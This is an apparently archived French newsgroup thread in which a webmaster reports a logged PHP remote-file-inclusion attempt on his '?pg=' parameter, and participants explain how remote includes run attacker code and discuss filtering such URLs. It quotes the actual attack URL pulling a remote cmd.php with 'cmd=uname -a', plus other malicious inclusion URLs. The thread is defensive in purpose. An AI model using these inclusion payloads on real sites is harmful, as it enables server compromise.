Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php
et le texte des pages change avec une variable en ajoutant ?pg=YYYY.
Jusque là c'est banal.
Je vois cette nuit que quelqu'un est venu faire :
http://www.XXXX.fr/index.php?pg=http://www.dpalone.hpg.com.br/cmd.php?&cmd=uname%20-a
J'en déduis que la bébette au bout du 207.44.154.XX à 02:39:43 voulait
faire quelque chose, mais quoi ?
Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php et le texte des pages change avec une variable en ajoutant ?pg=YYYY. Jusque là c'est banal. Je vois cette nuit que quelqu'un est venu faire :
Voici 2 autres qui reviennent souvent dans mes logs en error404 avec le même procédé de tentative d'inclusion que toi :
http://xor2560.tripod.com/2
et
http://www.tobyb.com/images/test.ph
On pourrait faire une liste de ces #{~#[|{##[, non ?
-- Fred
Bonjour,
Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php
et le texte des pages change avec une variable en ajoutant ?pg=YYYY.
Jusque là c'est banal.
Je vois cette nuit que quelqu'un est venu faire :
Notre site est accessible grace à l'url : http://www.XXXX.fr/index.php et le texte des pages change avec une variable en ajoutant ?pg=YYYY. Jusque là c'est banal. Je vois cette nuit que quelqu'un est venu faire :
On pourrait faire une liste de ces #{~#[|{##[, non ?
ca servirait a quoi ?
à améliorer ces scripts :-)
Patrick
Merci ca je sais très bien, mais relisez ce qui précède: avec ce print, le system() n'est *pas* exécuté sur le serveur attaqué. Donc attaque point il n'y a.
bah si justement, c'est sur le serveur distant qu'il n'est pas exécuté mais il l'est bel et bien sur le serveur attaqué.. ou alors j'ai rien capté à tout ce qui me paraissait clair y'a 5 minutes ^___^
Non, en fait vous avez raison, je me suis laissé emporté en pensant à autre chose, mais le include distant force l'exécution distante, donc les commandes d'attque doivent être ``protégées'' pour ne pas être exécutées à distance.
Satané PHP, quelle mauvaise idée d'autoriser les url dans les include...
Patrick.
Merci ca je sais très bien, mais relisez ce qui précède: avec ce print,
le system() n'est *pas* exécuté sur le serveur attaqué. Donc attaque
point il n'y a.
bah si justement, c'est sur le serveur distant qu'il n'est pas exécuté
mais il l'est bel et bien sur le serveur attaqué.. ou alors j'ai rien
capté à tout ce qui me paraissait clair y'a 5 minutes ^___^
Non, en fait vous avez raison, je me suis laissé emporté en pensant à
autre chose, mais le include distant force l'exécution distante, donc les
commandes d'attque doivent être ``protégées'' pour ne pas être exécutées
à distance.
Satané PHP, quelle mauvaise idée d'autoriser les url dans les include...
Merci ca je sais très bien, mais relisez ce qui précède: avec ce print, le system() n'est *pas* exécuté sur le serveur attaqué. Donc attaque point il n'y a.
bah si justement, c'est sur le serveur distant qu'il n'est pas exécuté mais il l'est bel et bien sur le serveur attaqué.. ou alors j'ai rien capté à tout ce qui me paraissait clair y'a 5 minutes ^___^
Non, en fait vous avez raison, je me suis laissé emporté en pensant à autre chose, mais le include distant force l'exécution distante, donc les commandes d'attque doivent être ``protégées'' pour ne pas être exécutées à distance.
Satané PHP, quelle mauvaise idée d'autoriser les url dans les include...
Patrick.
Thibaut Allender
Non, en fait vous avez raison, je me suis laissé emporté en pensant à autre chose, mais le include distant force l'exécution distante, donc les commandes d'attque doivent être ``protégées'' pour ne pas être exécutées à distance.
oui, en fait c'est l'inverse de ce que tu dis ;) sans print, la commande serait effectivement executee sur le serveur distant
le but du print est ici de "generer" un include sans en executer le code prealablement
(je crois que j'ai reussi a etre clair cette fois, enfin j'espere)
Non, en fait vous avez raison, je me suis laissé emporté en pensant à
autre chose, mais le include distant force l'exécution distante, donc les
commandes d'attque doivent être ``protégées'' pour ne pas être exécutées
à distance.
oui, en fait c'est l'inverse de ce que tu dis ;)
sans print, la commande serait effectivement executee sur le serveur distant
le but du print est ici de "generer" un include sans en executer le code
prealablement
(je crois que j'ai reussi a etre clair cette fois, enfin j'espere)
Non, en fait vous avez raison, je me suis laissé emporté en pensant à autre chose, mais le include distant force l'exécution distante, donc les commandes d'attque doivent être ``protégées'' pour ne pas être exécutées à distance.
oui, en fait c'est l'inverse de ce que tu dis ;) sans print, la commande serait effectivement executee sur le serveur distant
le but du print est ici de "generer" un include sans en executer le code prealablement
(je crois que j'ai reussi a etre clair cette fois, enfin j'espere)
On pourrait faire une liste de ces #{~#[|{##[, non ?
ca servirait a quoi ?
Possiblement à filtrer (erreur 400 ou 40*) si l'une des url est trouvée dans la QUERY_STRING ou à envoyer automatiquement un abuse suivant l'ip de connextion, que sais je encore.
Enfin ça reste HS :-)
-- Stephane Kanschine Amadouer l'anti-spam pour me répondre
Dans <c1kqml$bjq$1@news.brutele.be>, Thibaut Allender tapotait :
On pourrait faire une liste de ces #{~#[|{##[, non ?
ca servirait a quoi ?
Possiblement à filtrer (erreur 400 ou 40*) si l'une des url est trouvée
dans la QUERY_STRING ou à envoyer automatiquement un abuse suivant l'ip
de connextion, que sais je encore.
Enfin ça reste HS :-)
--
Stephane Kanschine
Amadouer l'anti-spam pour me répondre
On pourrait faire une liste de ces #{~#[|{##[, non ?
ca servirait a quoi ?
Possiblement à filtrer (erreur 400 ou 40*) si l'une des url est trouvée dans la QUERY_STRING ou à envoyer automatiquement un abuse suivant l'ip de connextion, que sais je encore.
Enfin ça reste HS :-)
-- Stephane Kanschine Amadouer l'anti-spam pour me répondre